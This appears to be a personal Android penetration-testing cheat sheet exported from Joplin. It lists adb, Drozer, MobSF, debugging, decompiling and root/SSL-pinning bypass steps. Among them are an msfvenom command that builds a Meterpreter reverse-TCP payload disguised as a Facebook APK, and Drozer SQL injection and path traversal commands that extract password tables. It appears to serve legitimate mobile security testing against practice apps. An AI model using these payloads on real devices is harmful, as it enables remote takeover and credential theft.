				.fountain .dialogue h4 {
					margin: 0;
				}

				.fountain .dialogue h1,
				.fountain .dialogue h2,
				.fountain .dialogue h3,
				.fountain .dialogue h4 {
					text-align: center;
				}
.mermaid { background-color: white; width: 640px; }</style><div id="rendered-md"><nav class="table-of-contents"><ul><li><a href="#url">URL</a></li><li><a href="#adb-command">ADB command</a><ul><li><a href="#adb-pull-permission-denied">ADB pull permission denied</a></li></ul></li><li><a href="#automatic-dynamic-analysis">Automatic Dynamic Analysis</a></li><li><a href="#automatic-static-analysis">Automatic static analysis</a><ul><li><a href="#drozer">Drozer</a></li><li><a href="#androbugs">Androbugs</a></li><li><a href="#qark">QARK</a></li><li><a href="#mobsf">MobSF</a></li><li><a href="#super">Super</a></li><li><a href="#tools">Tools</a></li></ul></li><li><a href="#coding">Coding</a><ul><li><a href="#save-to-file">save to file</a></li></ul></li><li><a href="#debug">debug</a></li><li><a href="#manual-static-analysis">Manual Static Analysis</a></li><li><a href="#network">Network</a><ul><li><a href="#proxy">Proxy</a></li></ul></li><li><a href="#exploit">exploit</a><ul><li><a href="#metasploit">metasploit</a></li></ul></li><li><a href="#owasp">owasp</a><ul><li><a href="#local-data-storage">local data storage</a><ul><li><a href="#sqlite">SQLite</a></li></ul></li><li><a href="#log">log</a></li><li><a href="#ipc">IPC</a></li><li><a href="#testing-network-comm">Testing Network Comm</a></li></ul></li><li><a href="#reverse-engineering">Reverse Engineering</a><ul><li><a href="#binary">binary</a></li><li><a href="#dex2jar">dex2jar</a></li><li><a href="#enjarify">enjarify</a></li><li><a href="#sign-apk">sign apk</a></li><li><a href="#bytecode-viewer">Bytecode Viewer</a></li><li><a href="#deobfuscation">Deobfuscation</a></li></ul></li><li><a href="#bypass">Bypass</a><ul><li><a href="#rooting">Rooting</a></li><li><a href="#ssl-pinning">SSL Pinning</a></li></ul></li><li><a href="#snapshot">Snapshot</a></li><li><a href="#sqli">SQLi</a></li><li><a href="#exploit-1">exploit</a></li><li><a href="#vulnerable-app">vulnerable app</a></li><li><a href="#tips">Tips</a><ul><li><a href="#screen-mirror">screen mirror</a></li><li><a href="#show-architecture">show architecture</a></li></ul></li></ul></nav><h1 id="url">URL</h1>
<p><sup class="footnote-ref"><a href="#fn1" id="fnref1">[1]</a></sup></p>
<h1 id="adb-command">ADB command</h1>
<p><code class="inline-code">adb shell pm path &lt;packageName&gt;</code>
<code class="inline-code">adb backup -all</code></p>
<p>adb shell content:
<a data-from-md title='https://stackoverflow.com/questions/27988069/query-android-content-provider-from-command-line-adb-shell/27993247' href='https://stackoverflow.com/questions/27988069/query-android-content-provider-from-command-line-adb-shell/27993247'>https://stackoverflow.com/questions/27988069/query-android-content-provider-from-command-line-adb-shell/27993247</a></p>
<p>download folder:</p>
<div class="joplin-editable"><pre class="joplin-source" data-joplin-language="" data-joplin-source-open="```&#10;" data-joplin-source-close="&#10;```">adb shell su
chmod -R 777 [target folder]
chmod -R 777 /data/app
adb pull [target folder] .
adb pull /data/app/ .</pre><pre class="hljs"><code>adb shell su
chmod -R <span class="hljs-number">777</span> [target folder]
chmod -R <span class="hljs-number">777</span> <span class="hljs-regexp">/data/</span>app
adb pull [target folder] .
adb pull <span class="hljs-regexp">/data/</span>app/ .</code></pre></div>
<p><code class="inline-code">$ adb backup [-f &lt;file&gt;] [-apk|-noapk] [-shared|-noshared] [-all] [-system|nosystem] [&lt;packages\...\&gt;]</code></p>
<p>ex.:
<code class="inline-code">$ adb backup -shared -system &lt;package.name&gt; -f backup.ab</code>
<code class="inline-code">$ adb backup -system &lt;pacakage.name&gt; -f backup.ab</code>
<code class="inline-code">$ adb backup &quot;-apk -nosystem &lt;package-name&gt;&quot;</code></p>
<p>abe: E:\Hacking\program\bin\abe.jar
unpack:
<code class="inline-code">$ abe unpack &lt;backup.ab&gt; &lt;backup.tar&gt; [password]</code> OR
<code class="inline-code">$ dd if=backup.ab bs=1 skip=24 | python -c &quot;import zlib,sys;sys.stdout.write(zlib.decompress(sys.stdin.read()))&quot; &gt; backup.tar</code></p>
<h3 id="adb-pull-permission-denied">ADB pull permission denied</h3>
<p>Check if selinux is enabled.</p>
<div class="joplin-editable"><pre class="joplin-source" data-joplin-language="" data-joplin-source-open="```&#10;" data-joplin-source-close="&#10;```">$ adb shell
su
# getenforce
Enforcing</pre><pre class="hljs"><code><span class="hljs-variable">$ </span>adb shell
su
<span class="hljs-comment"># getenforce</span>
Enforcing</code></pre></div>
<p>Selinux is enabled and blocking/enforcing. Disable selinux: <code class="inline-code">setenforce 0</code>
do your stuff and set selinux to enforcing: <code class="inline-code">setenforce 1</code></p>
<h1 id="automatic-dynamic-analysis">Automatic Dynamic Analysis</h1>
<blockquote>
<p>droidbox, mobsf, passionfruit,</p>
</blockquote>
<p>linux docker</p>
<p><code class="inline-code">$ docker -run -it ---rm -v ~/samples:/samples honeynet/droidbox /samples/triada.apk 10</code></p>
<h1 id="automatic-static-analysis">Automatic static analysis</h1>
<blockquote>
<p>mobsf, <a data-from-md title='https://vulnerabilitytest.quixxi.com/#' href='https://vulnerabilitytest.quixxi.com/#'>https://vulnerabilitytest.quixxi.com/#</a>, oversecured, immunityweb, ostorlab
androwarn, RiskInDroid, super, classyshark, stacoan</p>
</blockquote>
<h2 id="drozer">Drozer</h2>
<h2 id="androbugs">Androbugs</h2>
<p><code class="inline-code">$ python androbugs.py -f &lt;APK file&gt;</code></p>
<h2 id="qark">QARK</h2>
<div class="joplin-editable"><pre class="joplin-source" data-joplin-language="" data-joplin-source-open="```&#10;" data-joplin-source-close="&#10;```"># qark
$ /usr/bin/python /root/.local/bin/qark --sdk-path /root/android/platforms --debug --apk &lt;apk_file.apk&gt; --exploit-apk --keep-report</pre><pre class="hljs"><code><span class="hljs-comment"># qark</span>
$ <span class="hljs-regexp">/usr/</span>bin<span class="hljs-regexp">/python /</span>root<span class="hljs-regexp">/.local/</span>bin<span class="hljs-regexp">/qark --sdk-path /</span>root<span class="hljs-regexp">/android/</span>platforms --debug --apk &lt;apk_file.apk&gt; --exploit-apk --keep-report</code></pre></div>
<h2 id="mobsf">MobSF</h2>
<p>troubleshoot kalo ada masalah network:
use vpn!</p>
<p>parrot:
<code class="inline-code">$ docker run -it -p 8000:8000 opensecurity/mobile-security-framework-mobsf:latest</code></p>
<h2 id="super">Super</h2>
<p>laptop_thales: C:\Users\thales02\Documents\hacking\mobile\program\super
<code class="inline-code">$ super-analyzer.exe -v --min-criticality low &lt;apk_file.apk&gt;</code></p>
<p><sup class="footnote-ref"><a href="#fn2" id="fnref2">[2]</a></sup></p>
<h2 id="tools">Tools</h2>
<p>Androwarn</p>
<h1 id="coding">Coding</h1>
<h2 id="save-to-file">save to file</h2>
<p><img data-from-md data-resource-id="4767d81c9d464567bc3baafcbed2b74c" src="https://gsmrhbalqw.joplinusercontent.com/shares/3sAmcMo5Bn21xRQrJ4PMTh?resource_id=4767d81c9d464567bc3baafcbed2b74c&amp;t=1652626840436" title="" alt=""/></p>
<h1 id="debug">debug</h1>
<blockquote>
<p>JDWP</p>
</blockquote>
<p><code class="inline-code">$ adb shell ps</code>
<code class="inline-code">$ adb jdwp</code></p>
<p>attach to PID
<code class="inline-code">$ adb forward tcp:12345 jdwp:&lt;the PID&gt;</code>
<code class="inline-code">$ jdb -attach localhost:12345</code></p>
<p>list all classes: <code class="inline-code">$ classes</code>
list all methods: <code class="inline-code">$ methods com.android.insecurebankv2.PostLogin</code>
put breakpoint in method: <code class="inline-code">$ stop in com.android.insecurebankv2.PostLogin.showRootStatus()</code>
once on the breakpoint, to move to next method: #class
to show variables: $ locals
to change variable: $ set isrooted = false
bypass debug true:
developer options → select app to be debugable
$ { echo “suspend”;cat; } | jdb -attach localhost:12345
to resume until breakpoinr: #resume</p>
<p>example:
<img data-from-md data-resource-id="db95631d8ca54905afc26a7521992470" src="https://gsmrhbalqw.joplinusercontent.com/shares/3sAmcMo5Bn21xRQrJ4PMTh?resource_id=db95631d8ca54905afc26a7521992470&amp;t=1652626840454" title="" alt=""/></p>
<p>to get s.equals, stop at java.lang.String.equals()</p>
<p><sup class="footnote-ref"><a href="#fn3" id="fnref3">[3]</a></sup>
<sup class="footnote-ref"><a href="#fn4" id="fnref4">[4]</a></sup></p>
<h1 id="manual-static-analysis">Manual Static Analysis</h1>
<p>link:
<sup class="footnote-ref"><a href="#fn5" id="fnref5">[5]</a></sup></p>
<h1 id="network">Network</h1>
<h2 id="proxy">Proxy</h2>
<p>android studio:
<img data-from-md data-resource-id="a217368bf2614af7ad4d0d46d08af97f" src="https://gsmrhbalqw.joplinusercontent.com/shares/3sAmcMo5Bn21xRQrJ4PMTh?resource_id=a217368bf2614af7ad4d0d46d08af97f&amp;t=1652626840448" title="" alt="4b0786c006a2207c619e736b0a39d5a6.png"/></p>
<h1 id="exploit">exploit</h1>
<h2 id="metasploit">metasploit</h2>
<div class="joplin-editable"><pre class="joplin-source" data-joplin-language="" data-joplin-source-open="```&#10;" data-joplin-source-close="&#10;```">msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.11 LHOST=4444 R &gt; Facebook-Hacking2.apk
msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST
set LPORT
show options
exploit</pre><pre class="hljs"><code>msfvenom -p android/meterpreter/reverse_tcp <span class="hljs-attribute">LHOST</span>=192.168.1.11 <span class="hljs-attribute">LHOST</span>=4444 R &gt; Facebook-Hacking2.apk
msfconsole
use exploit/multi/handler
<span class="hljs-built_in">set</span> payload android/meterpreter/reverse_tcp
<span class="hljs-built_in">set</span> LHOST
<span class="hljs-built_in">set</span> LPORT
show options
exploit</code></pre></div>
<h1 id="owasp">owasp</h1>
<h2 id="local-data-storage">local data storage</h2>
<p>/data/app</p>
<ul>
<li>common key location and gradle properties</li>
<li>list of local storage - static analysis</li>
<li>cek permission</li>
<li>cek file yg seharusnya ga ada
cek:</li>
<li>input validation</li>
<li>logs</li>
<li>data sent</li>
<li>cache keyboard</li>
<li>ipc (drozer)</li>
<li>user interface</li>
<li>backup</li>
<li>screenshot</li>
<li>memory</li>
<li></li>
</ul>
<h3 id="sqlite">SQLite</h3>
<blockquote>
<p>DB Browser for SQLite</p>
</blockquote>
<h2 id="log">log</h2>
<ul>
<li>proguard bisa digunakan untuk hapus log</li>
<li>logcat :</li>
</ul>
<div class="joplin-editable"><pre class="joplin-source" data-joplin-language="" data-joplin-source-open="```&#10;" data-joplin-source-close="&#10;```">certain app:
$ adb logcat | grep &quot;$(adb shell ps | grep &lt;package-name&gt; | awk -F&quot; &quot; '{print $2}')&quot;
notes: di windows, grep -&gt; findstr, kalo '' ga bisa pake &quot;&quot;
if pid is known:
$ adb logcat --pid=&lt;pid-number&gt;
use regex:
-e &lt;expr&gt;, --regex=&lt;expr&gt; </pre><pre class="hljs"><code>certain app:
$ adb logcat | <span class="hljs-keyword">grep</span> <span class="hljs-string">&quot;$(adb shell ps | grep &lt;package-name&gt; | awk -F&quot;</span> <span class="hljs-string">&quot; &#x27;{print $2}&#x27;)&quot;</span>
notes: <span class="hljs-keyword">di</span> windows, <span class="hljs-keyword">grep</span> -&gt; findstr, kalo <span class="hljs-string">&#x27;&#x27;</span> ga bisa pake <span class="hljs-string">&quot;&quot;</span>
<span class="hljs-keyword">if</span> pid <span class="hljs-keyword">is</span> known:
$ adb logcat --pid=<span class="hljs-symbol">&lt;pid-number&gt;</span>
use regex:
-<span class="hljs-keyword">e</span> <span class="hljs-symbol">&lt;expr&gt;</span>, --regex=<span class="hljs-symbol">&lt;expr&gt;</span> </code></pre></div>
<p>increase log buffer: <code class="inline-code">$ adb logcat -G 100M</code></p>
<p>url:
<a data-from-md title='https://stackoverflow.com/questions/48689930/logcat-crashes-with-error-unexpected-eof' href='https://stackoverflow.com/questions/48689930/logcat-crashes-with-error-unexpected-eof'>https://stackoverflow.com/questions/48689930/logcat-crashes-with-error-unexpected-eof</a></p>
<h2 id="ipc">IPC</h2>
<blockquote>
<p>drozer</p>
</blockquote>
<div class="joplin-editable"><pre class="joplin-source" data-joplin-language="" data-joplin-source-open="```&#10;" data-joplin-source-close="&#10;```">$dz&gt; run app.provider.info -a com.mwr.example.sieve
##get uris:
dz&gt; run scanner.provider.finduris -a com.mwr.example.sieve
##extract provider:
dz&gt; run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --vertical
##to inset update record:
dz&gt; run app.provider.insert content://com.vulnerable.im/messages
dz&gt; run app.provider.update content://settings/secure
dz&gt; run app.provider.delete content://settings/secure
##sql injection:
dz&gt; run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection &quot;'&quot;
dz&gt; run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection &quot;*
dz&gt; run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection &quot;*
FROM SQLITE_MASTER WHERE type='table';--&quot;
##File System Based Content Providers
dz&gt; run app.provider.download content://com.vulnerable.app.FileProvider/../../../../../../../../data/data/com.vulnerable.app/database.db /home/user/database.db
dz&gt; run scanner.provider.traversal -a com.mwr.example.sieve</pre><pre class="hljs"><code>$dz&gt; run app.provider.info -a com.mwr.example.sieve
##get uris:
dz&gt; run scanner.provider.finduris -a com.mwr.example.sieve
##extract provider:
dz&gt; run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --vertical
##to inset update record:
dz&gt; run app.provider.insert content://com.vulnerable.im/messages
dz&gt; run app.provider.update content://settings/secure
dz&gt; run app.provider.delete content://settings/secure
##sql injection:
dz&gt; run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection &quot;'&quot;
dz&gt; run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection &quot;*
dz&gt; run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection &quot;*
FROM SQLITE_MASTER WHERE type='table';--&quot;
##File System Based Content Providers
dz&gt; run app.provider.download content://com.vulnerable.app.FileProvider/../../../../../../../../data/data/com.vulnerable.app/database.db /home/user/database.db
dz&gt; run scanner.provider.traversal -a com.mwr.example.sieve</code></pre></div>
<p>start activity: <code class="inline-code">$ run app.activity.start --component com.example.root.intent_exercise com.example.root.intent_exercise.send_data_activity --extra string value1 &quot;test1&quot; --extra string value2 &quot;test2&quot;</code></p>
<h2 id="testing-network-comm">Testing Network Comm</h2>
<ul>
<li>burp</li>
<li>burp using extension non http extension</li>
<li>hooking using frida and cycript</li>
</ul>
<h1 id="reverse-engineering">Reverse Engineering</h1>
<blockquote>
<p>jadx-gui, bytecode viewer, simplify, dex2jar, apktool</p>
</blockquote>
<h2 id="binary">binary</h2>
<blockquote>
<p>radare2</p>
</blockquote>
<p><img data-from-md data-resource-id="313de97e2216489eb7f2f08e7d3c7c4c" src="https://gsmrhbalqw.joplinusercontent.com/shares/3sAmcMo5Bn21xRQrJ4PMTh?resource_id=313de97e2216489eb7f2f08e7d3c7c4c&amp;t=1652626840422" title="" alt=""/></p>
<p>cek dengan apktool trus di lib, buka file .so dengan radare2
(linux: #r2 so-file)
aaa: analyze all
afl: list functions
go to function: #ahi s @@=0x00001110
#pdf</p>
<p>link: <a data-from-md title='https://gist.github.com/williballenthin/6857590dab3e2a6559d7' href='https://gist.github.com/williballenthin/6857590dab3e2a6559d7'>https://gist.github.com/williballenthin/6857590dab3e2a6559d7</a></p>
<h2 id="dex2jar">dex2jar</h2>
<p>dex2jar:</p>
<p><code class="inline-code">$ sh d2j-dex2jar.sh -f ~/path/to/apk_to_decompile.apk -o result.jar</code>
<code class="inline-code">$ sh dex2jar.sh -f \~/path/to/apk_to_decompile.apk</code></p>
<h2 id="enjarify">enjarify</h2>
<p>windows:
change enjarify.bat into python3 ke py
<code class="inline-code">$ enjarify yourapp.apk -o yourapp.jar</code></p>
<h2 id="sign-apk">sign apk</h2>
<p>(1)</p>
<ul>
<li><code class="inline-code">$ apktool b &lt;modified folder&gt; -o output.apk</code></li>
<li><code class="inline-code">$ zipalign -p 4 android_app.apk android_app-aligned.apk</code></li>
<li><code class="inline-code">$ keytool -genkey -v -keystore test.keystore -alias Test -keyalg RSA -keysize 1024 -sigalg SHA1withRSA -validity 10000</code></li>
<li><code class="inline-code">$ jarsigner -keystore test.keystore android_app-aligned.apk -sigalg SHA1withRSA -digestalg SHA1 Test</code></li>
</ul>
<p>(2)</p>
<blockquote>
<p>uber-apk-signer</p>
</blockquote>
<p>req:
<img data-from-md data-resource-id="70ff3b4ca7504eb187716560200952de" src="https://gsmrhbalqw.joplinusercontent.com/shares/3sAmcMo5Bn21xRQrJ4PMTh?resource_id=70ff3b4ca7504eb187716560200952de&amp;t=1652626840442" title="" alt="b7eded12d2e9cc32b9f1b87abda58504.png"/>
<code class="inline-code">$ java -jar uber-apk-signer.jar --apk app.apk</code>
<sup class="footnote-ref"><a href="#fn6" id="fnref6">[6]</a></sup></p>
<h2 id="bytecode-viewer">Bytecode Viewer</h2>
<p>D:\agung\Documents\Agung\hacking\android</p>
<p>java -jar Bytecode-Viewer-2.9.22.jar</p>
<p>If you are working with smali. Select View -&gt; Pane 1 -&gt; JD-GUI -&gt;
Java and View -&gt; Pane 2 -&gt; Smali/DEX -&gt; Smali/DEX</p>
<p>Select a .class file to view the code.</p>
<p>link: <a data-from-md title='https://www.andnixsh.com/2018/02/tool-bytecodeviewer.html' href='https://www.andnixsh.com/2018/02/tool-bytecodeviewer.html'>https://www.andnixsh.com/2018/02/tool-bytecodeviewer.html</a></p>
<h2 id="deobfuscation">Deobfuscation</h2>
<p>D:\agung\Documents\Agung\hacking\android\
<a data-from-md title='https://github.com/CalebFenton/simplify' href='https://github.com/CalebFenton/simplify'>https://github.com/CalebFenton/simplify</a>
#java -jar simplify-1.2.1.jar (apk-file)</p>
<h1 id="bypass">Bypass</h1>
<h2 id="rooting">Rooting</h2>
<p>frida:</p>
<ul>
<li>codeshare: PC: E:\Hacking\android\progam\frida\codeshare\root_bypass</li>
<li>thesis: PC G:\My Drive\Binus\Thesis\ResultApp* APK: PC: E:\Hacking\android\APKs\thesis</li>
<li>magisk: zygisk, module: Universal Safenet Fix</li>
<li>xposed: rootcloak, <a data-from-md title='https://github.com/ViRb3/TrustMeAlready' href='https://github.com/ViRb3/TrustMeAlready'>https://github.com/ViRb3/TrustMeAlready</a></li>
<li><a data-from-md title='https://github.com/sensepost/objection' href='https://github.com/sensepost/objection'>https://github.com/sensepost/objection</a>
<sup class="footnote-ref"><a href="#fn7" id="fnref7">[7]</a></sup></li>
<li>reflutter
<sup class="footnote-ref"><a href="#fn8" id="fnref8">[8]</a></sup></li>
</ul>
<h2 id="ssl-pinning">SSL Pinning</h2>
<p>part of magisk:
<a data-from-md title='https://github.com/NVISOsecurity/MagiskTrustUserCerts/releases' href='https://github.com/NVISOsecurity/MagiskTrustUserCerts/releases'>https://github.com/NVISOsecurity/MagiskTrustUserCerts/releases</a>
part of frida:
<a data-from-md title='https://codeshare.frida.re/@pcipolloni/universal-android-ssl-pinning-bypass-with-frida/' href='https://codeshare.frida.re/@pcipolloni/universal-android-ssl-pinning-bypass-with-frida/'>https://codeshare.frida.re/@pcipolloni/universal-android-ssl-pinning-bypass-with-frida/</a></p>
<h1 id="snapshot">Snapshot</h1>
<p>location:
<img data-from-md data-resource-id="3176e76682a5487c87d48147c9f92cbf" src="https://gsmrhbalqw.joplinusercontent.com/shares/3sAmcMo5Bn21xRQrJ4PMTh?resource_id=3176e76682a5487c87d48147c9f92cbf&amp;t=1652626840429" title="" alt="14e2ba33246e259d01f83dac99a50147.png"/></p>
<h1 id="sqli">SQLi</h1>
<p><img data-from-md data-resource-id="11db0267ad9a4cb88ab0e97192e9fece" src="https://gsmrhbalqw.joplinusercontent.com/shares/3sAmcMo5Bn21xRQrJ4PMTh?resource_id=11db0267ad9a4cb88ab0e97192e9fece&amp;t=1652626840414" title="" alt=""/></p>
<h1 id="exploit-2">exploit</h1>
<p><a data-from-md title='https://github.com/jofpin/trape' href='https://github.com/jofpin/trape'>https://github.com/jofpin/trape</a>
<a data-from-md title='https://github.com/thewhiteh4t/seeker' href='https://github.com/thewhiteh4t/seeker'>https://github.com/thewhiteh4t/seeker</a></p>
<h1 id="vulnerable-app">vulnerable app</h1>
<p><a data-from-md title='https://pentester.land/cheatsheets/2018/10/12/list-of-Intentionally-vulnerable-android-apps.html' href='https://pentester.land/cheatsheets/2018/10/12/list-of-Intentionally-vulnerable-android-apps.html'>https://pentester.land/cheatsheets/2018/10/12/list-of-Intentionally-vulnerable-android-apps.html</a></p>
<p>They are sorted by “last update” date:</p>
<p>FIY, sieve can be tested
with <a data-from-md title='https://labs.mwrinfosecurity.com/tools/drozer/' href='https://labs.mwrinfosecurity.com/tools/drozer/'>Drozer</a> for
automation. They’re from the same authors.
And <a data-from-md title='https://github.com/tanprathan/sievePWN' href='https://github.com/tanprathan/sievePWN'>sievePWN</a> provides examples
of malicious apps which exploit some of sieve’s vulnerabilities.</p>
<h1 id="tips">Tips</h1>
<h2 id="screen-mirror">screen mirror</h2>
<blockquote>
<p>CXTouch, vysor, scrcpy
for no usb debug and no cable: Screen Stream over HTTP</p>
</blockquote>
<p>scrcpy -&gt; screenshot even if not allowed</p>
<p><a data-from-md title='https://github.com/cxplan/CXTouch/releases' href='https://github.com/cxplan/CXTouch/releases'>https://github.com/cxplan/CXTouch/releases</a>
execute .sh in linux
link for android virtualbox: <a data-from-md title='https://www.osboxes.org/android-x86/' href='https://www.osboxes.org/android-x86/'>https://www.osboxes.org/android-x86/</a></p>
<h2 id="show-architecture">show architecture</h2>
<p><code class="inline-code">$ adb shell getprop ro.product.cpu.abi</code></p>
<hr class="footnotes-sep">
<section class="footnotes">
<ol class="footnotes-list">
<li id="fn1" class="footnote-item"><p><a data-from-md title='https://github.com/topwizard/MobileApp-Pentest-Cheatsheet' href='https://github.com/topwizard/MobileApp-Pentest-Cheatsheet'>https://github.com/topwizard/MobileApp-Pentest-Cheatsheet</a> <a href="#fnref1" class="footnote-backref">↩︎</a></p>
</li>
<li id="fn2" class="footnote-item"><p><a data-from-md title='https://github.com/SUPERAndroidAnalyzer/super/releases' href='https://github.com/SUPERAndroidAnalyzer/super/releases'>https://github.com/SUPERAndroidAnalyzer/super/releases</a> <a href="#fnref2" class="footnote-backref">↩︎</a></p>
</li>
<li id="fn3" class="footnote-item"><p><a data-from-md title='http://court-of-testing-analysing.blogspot.com/2018/11/going-old-fashion-debugging-android.html' href='http://court-of-testing-analysing.blogspot.com/2018/11/going-old-fashion-debugging-android.html'>http://court-of-testing-analysing.blogspot.com/2018/11/going-old-fashion-debugging-android.html</a> <a href="#fnref3" class="footnote-backref">↩︎</a></p>
</li>
<li id="fn4" class="footnote-item"><p><a data-from-md title='http://court-of-testing-analysing.blogspot.com/2019/01/owasp-crackme-write-up-version-2-day-10.html' href='http://court-of-testing-analysing.blogspot.com/2019/01/owasp-crackme-write-up-version-2-day-10.html'>http://court-of-testing-analysing.blogspot.com/2019/01/owasp-crackme-write-up-version-2-day-10.html</a> <a href="#fnref4" class="footnote-backref">↩︎</a></p>
</li>
<li id="fn5" class="footnote-item"><p><a data-from-md title='https://www.notion.so/suwandaru/androguard-3c3b9c204784410784d09eaeb335ed80' href='https://www.notion.so/suwandaru/androguard-3c3b9c204784410784d09eaeb335ed80'>https://www.notion.so/suwandaru/androguard-3c3b9c204784410784d09eaeb335ed80</a> <a href="#fnref5" class="footnote-backref">↩︎</a></p>
</li>
<li id="fn6" class="footnote-item"><p><a data-from-md title='https://github.com/patrickfav/uber-apk-signer' href='https://github.com/patrickfav/uber-apk-signer'>https://github.com/patrickfav/uber-apk-signer</a> <a href="#fnref6" class="footnote-backref">↩︎</a></p>
</li>
<li id="fn7" class="footnote-item"><p><a data-from-md title='https://medium.com/secarmalabs/comparison-of-different-android-root-detection-bypass-tools-8fd477251640' href='https://medium.com/secarmalabs/comparison-of-different-android-root-detection-bypass-tools-8fd477251640'>https://medium.com/secarmalabs/comparison-of-different-android-root-detection-bypass-tools-8fd477251640</a> <a href="#fnref7" class="footnote-backref">↩︎</a></p>
</li>
<li id="fn8" class="footnote-item"><p><a data-from-md title='https://www.youtube.com/watch?v=KnlxKOp03KY' href='https://www.youtube.com/watch?v=KnlxKOp03KY'>https://www.youtube.com/watch?v=KnlxKOp03KY</a> <a href="#fnref8" class="footnote-backref">↩︎</a></p>
</li>
</ol>
</section>
</div>
</div>



			</div>
		</main>
		<div class="footer">
			<div class="content has-text-centered">
				Joplin Cloud 2.8.2, copyright &copy; 2021 Laurent Cozic. For more information, see the <a href="https:&#x2F;&#x2F;joplincloud.com&#x2F;terms">Terms of Use</a> and <a href="https:&#x2F;&#x2F;joplincloud.com&#x2F;privacy">Privacy Policy</a>
			</div>
		</div>	</body>
</html>